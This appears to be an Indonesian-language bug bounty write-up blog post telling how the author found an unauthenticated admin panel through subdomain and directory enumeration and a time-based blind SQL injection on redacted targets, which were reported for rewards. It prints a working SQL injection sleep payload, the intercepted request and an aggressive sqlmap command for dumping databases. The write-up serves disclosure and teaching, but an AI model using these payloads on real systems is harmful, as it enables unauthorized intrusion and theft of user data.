u4y8Gs9fLTrJjhsijGL4SHOQBnG6Rdcc2m5wWn1z
Bookmark
Ezpedia

Bug Bounty Writeup Unauthorized Access to Admin Panel & SQL Injection

 


Halo, Saya Anta Maulana atau Parkerzanta di dunia maya. Kali ini saya akan menuliskan tentang temuan saya di Web yang mengadakan Bug Bounty Program.

Saya menemukan pada bulan April lalu, dan menemukan 2 Kerentanan Critical yaitu SQL Injection dan Unauthorized Access to Admin Panel atau Otorisasi masuk tidak sah ke halaman Panel admin, saya dapat masuk tanpa dimintai kredensial apapaun!

Saya menemukan 2 kerentanan  di atas tidak memakan banyak waktu, bisa dihitung hanya beberapa menit dengan bantuan Tools di bawah ini untuk Recon

  • Subfinder
  • Httpx
  • Waybackurls
  • Dirsearch
  • Sqlmap

Mencari Program Bug Bounty

Saya mencari sebuah program Bug bounty menggunakan Goole Dork berikut

inurl:/bug bounty
inurl:/security
inurl:security.txt
inurl:security "reward"
Bug Bounty program "reward"
inurl:/responsible disclosure
inurl:/responsible-disclosure/ reward
inurl:/responsible-disclosure/ swag
inurl:/responsible-disclosure/ bounty
responsible disclosure "reward" site:com
responsible disclosure hall of fame
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"

Setelah melakukan pencarian pada Google, saya memfilter untuk hasil pencarian untuk mencari program yang baru di publish beberapa minggu atau bulan lalu, seperti gambar di bawah

Apa itu Akses Tidak Sah ke Panel Admin?

Akses tidak sah ke panel admin terjadi ketika seseorang berhasil mendapatkan akses ke area administrator dari situs web Anda tanpa izin. Dengan akses ini, mereka dapat mengubah pengaturan situs web, menghapus atau menambahkan konten, atau bahkan mencuri informasi sensitif. Serangan semacam ini dapat memiliki dampak yang serius pada reputasi dan integritas situs web Anda.


Salah satu cara yang umum digunakan oleh penyerang untuk mendapatkan akses tidak sah ke panel admin adalah dengan menebak kata sandi yang lemah atau menggunakan metode "brute force" untuk menebak kata sandi yang kuat. Selain itu, penyerang juga dapat memanfaatkan kerentanan dalam perangkat lunak CMS yang digunakan oleh situs web Anda.

Cerita singkat menemukan Panel Admin

Sebelum melakukan pencarian Kerentanan saya melakukan sebuah pencarian Subdomain terlebih dahulu menggunakan Subfinder dan HTTPX untuk melihat Status Code dari Subdomain. Target  mempunya banyak nama subdomain sebagai berikut

Dan saya menemukan sebuah nama subdomain xeon4.redacted.com dengan respon 200 namun ketika saya membuka nama subdomain di atas, halaman tersebut hanya menampilkan text berikut


Bingung karna ini tidak menampilkan apapun:/ Saya melanjutkan pencarian titik akhir menggunakan Waybackurl namun itu hanya menampilkan file robots.txt 😐Saya tidak menyerah begitu saja, saya melakukan sebuah Pencarian Direktori dengan bantuan Tools Dirsearch

Dan apa yang bisa kalian tebak? yahhh, saya menemukan sebuah direktori Panel Admin! Dirsearch menunjukan Respon 200 untuk Direktori /adminpage Yang saya pikirkan adalah kemungkinan ini akan meminta sebuah username dan kata sandi untuk login.

Namun, ketika saya membuka direktori tersebut saya dapat masuk ke Halaman Panel Admin tanpa dimintai Kredensial apapun di xeon4.redacted.com/adminpage

Bisa kalian lihat di atas, di Halaman Admin terdepat Kredensial lain untuk masuk ke halaman lain, dan juga ada beberapa halaman yang menampilkan sebuah Informasi Sensitif pengguna lain seperti Email, Credit Card, Alamat dll.

Untuk temuan ini saya diberi hadiah sebesar $1000

Apa itu Serangan SQL Injection?

Serangan SQL injection adalah serangan yang dilakukan dengan memanfaatkan kerentanan dalam database situs web Anda. Dalam serangan ini, penyerang menyisipkan kode SQL berbahaya ke dalam input yang terkait dengan database, yang kemudian dieksekusi oleh server database. Serangan semacam ini dapat menyebabkan akses tidak sah ke data sensitif, perusakan basis data, atau bahkan pengambilalihan kontrol atas server.

Bagaimana saya menemukan SQL Injection

Mari kita lanjutkan, setelah saya menemukan sebuah Halaman Admin saya tidak berhenti disitu dan memutuskan untuk mencari kerentanan lain.

Saya menemukan sebuah subdomain lain yang saya temukan dari Halaman Admin di atas, lihat URL yang saya tutupi di bawah

Saya membuka tautan di atas, dan halaman tersebut menampilkan sebuah form dimana saya dapat melakukan pencarian Dokumen, lihat gambar di bawah

Saya mencegat permintaan saat melakukan pencarian dokumen, pada Parameter directform  Rentan terhadap serangan SQL Injection dan saya menemukan sebuah Kerentanan SQLI Time Based Blind dengan melakukan Test dengan Payload

'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z

Request

POST /xxxx/repository/xxxx? HTTP/2
Host: secure.redacted.com
Cookie: cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: https://secure.redacted.com
Referer: https://secure.redacted.com/xxxx/repository/xxxxx?
[...]

password=xxxxxx&directform=vulnerabilityhere

Respons

Waktu tidur 15s
'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
 
Waktu tidur 20s
'XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR'Z
 
Karna ini rentan terhadap SQLI saya memutuskan untuk melanjutkan ke Sqlmap, dan menyimpan Request di atas dengan perintah sederhana berikut
sqlmap -r request.txt -p directform --random-agent --level 5 --risk 3 --dbs --threads=10
 
Saya melaporkan 2 Krentanan di atas ke email mereka. Setelah beberapa minggu saya menunggu, saya di berikan Bounty $500 Untuk SQLI dan $1000 Untuk Admin panel

Saya harap kalian suka dengan tulisan saya, maaf jika ada salah saat penulisan. Ikuti saya di Twitter https://twitter.com/parkerzanta

For English soon on my Medium https://parkerzanta.medium.com/
3 komentar

3 komentar

  • Anonim
    Anonim
    28 Juli 2023 pukul 21.39
    outstanding move
    Reply
  • Anonim
    Anonim
    1 Mei 2023 pukul 18.52
    Congrats bro
    • Anonim
      Parkerzanta
      1 Mei 2023 pukul 22.41
      Thanks mate
    Reply